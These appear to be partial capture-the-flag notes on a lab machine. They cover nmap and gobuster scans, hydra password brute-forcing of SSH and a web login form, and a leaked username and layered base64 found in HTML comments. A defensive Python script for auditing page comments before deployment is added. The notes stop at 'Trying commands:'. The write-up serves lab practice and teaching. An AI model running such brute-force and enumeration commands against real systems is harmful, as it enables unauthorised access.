Source:
<!--
Note to self, remember username!
Username: R1ckRul3s
-->
$ nmap -A 10.10.134.61
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f8:89:83:22:6c:ab:84:05:23:b0:f6:d2:c0:42:e3:a6 (RSA)
| 256 cc:a0:09:40:f9:7c:3d:9c:ef:33:d1:19:26:88:45:5b (ECDSA)
|_ 256 f6:a1:ce:33:f5:74:3f:f0:a2:f5:6c:ec:0e:b0:73:f3 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ gobuster dir -u 10.10.134.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/assets (Status: 301) # nothing
/robots.txt (Status: 200) # "Wubbalubbadubdub"
$ hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt ssh://10.10.134.61
[ERROR] target ssh://10.10.134.61:22/ does not support password authentication (method reply 4).
$ nmap 10.10.134.61 --script ssh-brute --script-args userdb=user,passdb=/usr/share/wordlists/rockyou.txt
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
|_ssh-brute: Password authentication not allowed
Try /login.php, success!
$ hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt 10.10.134.61 http-post-form "/login.php:username=^USER^&password=^PASS^&sub=Login:Invalid username or password." -V
# nothing
Try "Wubbalubbadubdub" from robots.txt → success!
Login leads to "Command Panel". All other tabs → /denied.php: "Only the REAL rick can view this page.."
View source:
<!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->
kali$ echo -n Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d
rabbit hole
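Added example, not part of the original notes: both leaks above (the username in an HTML comment, the multiply-encoded base64 comment) are things a pre-deploy check on your own pages can catch. The function names, keyword list and sample page below are assumptions constructed for illustration.

```python
import base64, binascii, re
from html.parser import HTMLParser
# Assumed keyword list for credential-looking comments; tune per project.
SENSITIVE = re.compile(r"\b(user(name)?|pass(word)?|secret|token|key)\b\s*[:=]", re.I)
B64_RUN = re.compile(r"^[A-Za-z0-9+/]{16,}=*$")

def peel_base64(text, max_layers=10):
    """Decode while the value still looks like base64 text; return (layers, result)."""
    layers, current = 0, text.strip()
    while layers < max_layers and B64_RUN.match(current):
        body = current.rstrip("=")
        body += "=" * (-len(body) % 4)  # tolerate missing or extra padding
        try:
            decoded = base64.b64decode(body, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break  # not base64 text after all
        if not decoded.isprintable():
            break
        layers, current = layers + 1, decoded.strip()
    return layers, current

class CommentAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
    def handle_comment(self, data):
        # Flag credential hints, then try to peel every token in the comment.
        if SENSITIVE.search(data):
            self.findings.append(("credential-hint", data.strip()))
        for token in data.split():
            layers, plain = peel_base64(token)
            if layers:
                self.findings.append((f"base64-x{layers}", plain))

def audit_html(html):
    auditor = CommentAuditor()
    auditor.feed(html)
    return auditor.findings

def nest(text, times):  # helper that builds the constructed sample below
    for _ in range(times):
        text = base64.b64encode(text.encode()).decode()
    return text

# Constructed sample page, not the target's real source.
SAMPLE = ("<html><!--\nNote to self\nUsername: example-user\n-->"
          f"<p>Login</p><!-- {nest('constructed note', 3)} --></html>")

if __name__ == "__main__":
    print(audit_html(SAMPLE))
```

Running it over rendered templates in CI fails the build before such a comment reaches production; encoding depth is no protection, since the check peels layers until plain text appears.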
Trying commands: